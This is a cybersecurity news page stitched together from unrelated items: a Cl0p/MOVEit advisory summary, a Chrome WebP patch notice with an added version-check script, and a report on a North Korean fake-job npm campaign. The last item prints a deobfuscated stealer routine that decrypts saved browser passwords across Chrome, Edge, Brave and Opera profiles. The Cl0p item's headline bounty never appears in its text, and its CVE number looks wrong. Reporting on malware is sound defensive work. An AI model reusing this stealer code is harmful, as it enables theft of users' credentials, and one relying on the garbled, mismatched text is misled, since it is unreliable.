U.S. Govt offers $10 Million Bounty on Info About Cl0p Ransomware Gang
In recent times, there have been several reports about the CL0P ransomware gang exploiting the MOVEit Transfer application.
CISA and the FBI have published a joint Cybersecurity Advisory that documents the CL0P ransomware gang's TTPs (Tactics, Techniques, and Procedures), IoCs (Indicators of Compromise), and mitigations.
Based on the known information, the CL0P ransomware group has been targeting and exploiting an SQL injection vulnerability in the MOVEit File Transfer application (CVE-2023-3436).
Most of these exploitations targeted internet-facing deployments of the MOVEit managed file transfer (MFT) solution.
CL0P acted as a Ransomware-as-a-Service (RaaS) and an affiliate for other RaaS-based groups.
This threat actor acted as an Initial Access Broker (IAB) for other threat actors to enter the organization. This is typically done through a phishing campaign.
Between 2020 and 2021, they exploited several zero-day vulnerabilities targeting Accellion FTA servers and installed a web shell named DEWMODE.
At the start of this year, the threat actor exploited a zero-day vulnerability in the GoAnywhere MFT platform, affecting 130 victims in 10 days, a large impact in a short period.
A complete list of exploitation activity and methodologies was published by CISA and the FBI collaboratively, including TTPs, impact, IoCs, and other important information.
Mitigations
Review and monitor all remote access execution logs.
Google has upgraded the Stable and Extended stable channels to 116.0.5845.187 for Mac and Linux and 116.0.5845.187/.188 for Windows as part of a security update for Chrome.
This release comes with one “Critical” security patch. The upgrade will roll out over the following days and weeks.
Critical Vulnerability Addressed
The heap buffer overflow in WebP is a critical vulnerability tracked as CVE-2023-4863.
“Google is aware that an exploit for CVE-2023-4863 exists in the wild”, Google said in its security advisory.
The Citizen Lab at The University of Toronto’s Munk School and Apple Security Engineering and Architecture (SEAR) reported this on September 6th.
Google is still withholding further details about the attacks.
“Access to bug details and links may be kept restricted until a majority of users are updated with a fix,” Google explains.
In order to ensure the safety and security of our projects, we may need to maintain limitations if a bug is discovered in a third-party library that is also utilized by other projects. If this issue has not yet been resolved, it is critical that we continue to impose restrictions to prevent any potential harm or damage that may result from exploiting the vulnerability, Google said.
Chrome Security Update
“The Stable and Extended stable channels have been updated to 116.0.5845.187 for Mac and Linux and 116.0.5845.187/.188 for Windows, which will roll out over the coming days/weeks”, Google said.
Chrome for Linux and MacOS: 116.0.5845.187
Chrome for Windows: 116.0.5845.187/.188
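An added example, not from Google's advisory, that turns the fixed versions listed above into a patch-compliance check a fleet administrator can run over an inventory; the inventory format ({host, platform, version}) and the platform keys are assumptions.

```javascript
// Added example (not from Google's advisory): decide whether an installed Chrome build
// already carries the CVE-2023-4863 fix, using the fixed versions listed above.
// Google's Windows entry "116.0.5845.187/.188" means either build is fixed, so the
// lower of the two is the minimum.
const FIXED_VERSIONS = {
  linux: "116.0.5845.187",
  mac: "116.0.5845.187",
  windows: "116.0.5845.187/.188",
};

// "116.0.5845.187" -> [116, 0, 5845, 187]; anything malformed is rejected.
function parseVersion(s) {
  const parts = s.trim().split(".");
  if (parts.length !== 4 || !parts.every((p) => /^\d+$/.test(p))) {
    throw new Error(`bad Chrome version: ${s}`);
  }
  return parts.map(Number);
}

function compareVersions(a, b) {
  for (let i = 0; i < 4; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// Expand "A.B.C.D/.E" to the lowest full version it names.
function minimumFixed(spec) {
  const [first, ...alts] = spec.split("/");
  const base = parseVersion(first);
  let min = base;
  for (const alt of alts) {
    const candidate = [...base.slice(0, 3), Number(alt.replace(/^\./, ""))];
    if (compareVersions(candidate, min) < 0) min = candidate;
  }
  return min;
}

// true when `installed` on `platform` is at or above the fixed build.
function isPatched(platform, installed) {
  const spec = FIXED_VERSIONS[platform];
  if (!spec) throw new Error(`unknown platform: ${platform}`);
  return compareVersions(parseVersion(installed), minimumFixed(spec)) >= 0;
}

// Given an inventory like [{host, platform, version}], list hosts still to update.
function unpatchedHosts(inventory) {
  return inventory.filter((h) => !isPatched(h.platform, h.version)).map((h) => h.host);
}
```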
How to Update Google Chrome
On your computer, open Chrome.
At the top right, click More.
Click Help > About Google Chrome.
Click Update Google Chrome. Important: If you can’t find this button, you’re on the latest version.
Click Relaunch.
Install the update promptly to protect the system and browser against this issue.
Windows Malware Dropped From Fake Software Developers Job Offers Scheme
February 24, 2024 – Phylum, a leader in cybersecurity research, has unveiled a sophisticated malware campaign aimed at software developers seeking employment.
This alarming scheme, identified in collaboration with Palo Alto Networks' Unit 42, involves fake developer job offers that serve as a conduit for delivering malware onto unsuspecting victims' Windows systems.
Fake job description for a developer role
The campaign, linked to North Korean actors, leverages obfuscated JavaScript and has been tied to the notorious BeaverTail malware. This revelation is part of Phylum’s ongoing efforts to safeguard the open-source ecosystem from malicious actors.
The company's latest findings spotlight an npm package, masquerading as a code profiler, that installs malicious scripts designed to steal cryptocurrency and credentials.
According to the Phylum report shared with Cyber Security News, the attackers hid their malware within a test file, exploiting the fact that developers rarely scrutinize such code for threats. This tactic, however, contained critical flaws that enabled Phylum's researchers to connect the malicious package to suspect GitHub repositories, furthering their investigation into these activities.
On February 5, 2024, an npm user under the alias “nino1234” published a version of the execution-time-async package, closely mimicking the legitimate execution-time utility, which boasts over 27,000 downloads.
This counterfeit package, upon deobfuscation, revealed its true intent: to pilfer login credentials and passwords from various browsers. Following the initial theft, a Python script is downloaded and executed, triggering additional downloads and compromising further personal data.
Stealer supports multiple browsers
```javascript
const K = "/AppData/Local/Microsoft/Edge/User Data",
  P = (t, c) => {
    result = "";
    try {
      const r = `${t}`,
        e = require(`${homedir}/store.node`); // native addon bundled with the package
      if (osType != "Windows_NT") return;
      const E = "SELECT * FROM logins",
        s = `${H("~/")}${c}`;
      let F = path.join(s, "Local State");
      fs.readFile(F, "utf-8", (t, c) => {
        if (!t) {
          // os_crypt.encrypted_key from "Local State", base64-decoded to bytes
          (mkey = JSON.parse(c)),
            (mkey = mkey.os_crypt.encrypted_key),
            (mkey = ((t) => {
              var c = atob(t),
                r = new Uint8Array(c.length);
              for (let t = 0; t < c.length; t++) r[t] = c.charCodeAt(t);
              return r;
            })(mkey));
          try {
            const t = e.CryptUnprotectData(mkey.slice(5)); // DPAPI unwrap via the addon
            for (ii = 0; ii <= 200; ii++) {
              const c = 0 === ii ? "Default" : `Profile ${ii}`,
                e = `${s}/${c}/Login Data`,
                o = `${s}/t${c}`;
              if (!j(e)) continue;
              const F = `${r}_${ii}_Profile`;
              // each profile's "Login Data" SQLite DB is copied aside, then queried
              fs.copyFile(e, o, (c) => {
                try {
                  const c = new sqlite3.Database(o);
                  c.all(E, (r, e) => {
                    var E = "";
                    r ||
                      e.forEach((c) => {
                        var r = c.origin_url,
                          e = c.username_value,
                          o = c.password_value;
                        try {
                          "v" === o.subarray(0, 1).toString() &&
                            ((iv = o.subarray(3, 15)),
                            (cip = o.subarray(15, o.length - 16)),
                            cip.length &&
                              ((mmm = crypto.createDecipheriv("aes-256-gcm", t, iv).update(cip)),
                              (E = `${E}W:${r} U: ${e} P:${mmm.toString(
                                "latin1"
                              )}\n\n`)));
                        } catch (t) {}
                      }),
                      c.close(),
                      fs.unlink(o, (t) => {}), // temp copy removed after use
                      Ut(F, E);
                  });
                } catch (t) {}
              });
            }
          } catch (t) {}
        }
      });
    } catch (t) {}
  },
  ot = [
    [
      "/Library/Application Support/Google/Chrome",
      "/.config/google-chrome",
      "/AppData/Local/Google/Chrome/User Data",
    ],
    [
      "/Library/Application Support/BraveSoftware/Brave-Browser",
      "/.config/BraveSoftware/Brave-Browser",
      "/AppData/Local/BraveSoftware/Brave-Browser/User Data",
    ],
    [
      "/Library/Application Support/com.operasoftware.Opera",
      "/.config/opera",
      "/AppData/Roaming/Opera Software/Opera Stable/User Data",
    ],
  ],
  st = "Local Extension Settings", //Local Extension Settings
  Bt = "solana_id.txt";
```
Phylum’s discovery has not only shed light on this deceptive operation but has also prompted gratitude from the developer community. Several software developers, having narrowly avoided falling prey to this scheme, thanked Phylum for its pivotal role in raising awareness about this targeted attack.
As the investigation continues, Phylum remains committed to identifying and neutralizing threats within the open-source domain. The company urges developers and organizations alike to remain vigilant, especially when engaging with unsolicited job offers or integrating third-party packages into their projects.
For more technical analysis and information on protecting your systems and data from similar threats, visit Phylum's website or contact their cybersecurity experts directly.